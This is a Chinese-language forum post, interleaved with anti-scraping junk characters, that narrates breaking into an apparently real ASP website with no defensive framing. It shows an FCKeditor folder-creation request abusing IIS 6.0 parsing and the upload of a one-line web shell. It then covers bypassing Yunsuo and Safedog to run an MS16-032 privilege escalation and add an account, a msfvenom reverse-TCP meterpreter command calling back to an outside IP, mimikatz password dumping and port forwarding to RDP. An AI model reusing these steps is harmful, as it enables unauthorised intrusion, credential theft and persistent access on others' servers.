|
+ W( x9 L6 k) j2 |
& C" Q- {; l4 F& J
; `5 ?8 @" Q; a) m$ H( P : q; N7 X5 e8 t# q
|
9 o2 I2 E, W/ C $ S: u9 g! [4 _; [2 c0 k
% R8 H( a: l% A m! ?" G4 E& `
一、 利用getwebshell篇
& `1 k+ ?% F, [1 ~# [% r3 k( C2 w
/ F6 {; ]/ b' C1 I
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
% Q5 l% n5 K9 ~( c5 \
$ @- W2 E1 R( T0 @9 K6 F) Y9 y9 q! O
- d/ r' ^; n- L( q) F' O下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
7 ~# S i$ s% S3 q- f, k: |
; e5 p: r9 G8 U# l4 P
下面我们构造一个asp目录,如:
2 l0 |! _0 N9 E! d& |/ Z
( y. \3 n) ?3 v : k3 Y0 T8 T7 ?! M6 b5 B
http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 0 B/ b/ _2 x7 g- ~$ H' t7 B
" x, ^) Q3 j& m+ f, S# |0 n 1 [ X9 S' g6 q5 ?( S; }) f
然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
& v2 T' q' @' N+ r" q) M! P
- w9 g; l% t; J, w, R! U% B一、 绕过安全狗云锁提权并且加账号
* p3 g! T( {- j% o5 g
: O+ k: S2 r% R/ Y1 q+ B
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
/ f; O/ S; J. t" S+ T
# e3 N) u/ N6 a% U& O: D
如图:
8 f* y4 e3 }' _! u- z$ D
4 Y2 {% y2 {" K; S' h. C/ ~然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
2 P/ |0 ]- {# H* r$ V, U
" N& d$ Q& c3 A* `2 ^
一、 利用metasploit
/ v. c T+ z+ H0 g
. C4 q# {0 q x3 _0 [
首先用pentestbox生成一个64位的payload如下命令
" Q- G0 N3 ^: ?9 l9 S- b1 z6 k
* U$ c J. p c6 `# Z: U/ MmsfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
! L1 Q. z" n& y" F
% S5 H8 W# W" |& s- Z
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
" U+ x$ A) S Z$ h5 G2 x
3 f0 g! T2 h0 c$ z
下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图:
8 T; r3 w7 P! L4 k
/ ]- J' g. S: o' g6 f
下面我们来做一个监听如下命令:
0 \+ S8 @. _0 k/ v0 E, z5 a7 ?" n
" z6 V6 o5 C* O3 V% u1 p6 @% Hportfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图:
' d" N* \8 W7 ~. x 5 H5 N7 q) |. W2 c" q$ T
# L* h6 {2 Y9 N# H$ l# Q |
. w6 N; a: _ ?
# J5 B! x( C" U5 N ! Y- f0 x |6 ~; e& N5 T& ?
* Q4 A8 D% R7 N9 X# H( g+ q. j. Q! J' B% g, L
' i0 e# C4 i6 m
/ G1 A3 }4 b3 Q1 @$ i
5 S. F0 }4 {1 O7 N ^ 9 @" s7 c" P& F* T
/ X4 t8 {6 c/ w- u) A
/ m" V$ A5 j/ `2 v( H 9 y. b2 C; J! u3 I" i* a. @
: |# O' C! Y) R2 X3 F+ s* `$ M$ k
3 R2 {$ R/ Z' S" f0 ]3 T | 
发表于 2018-10-20 20:31:43
收藏
支持
反对
匿名
发表于 2021-11-20 23:30:06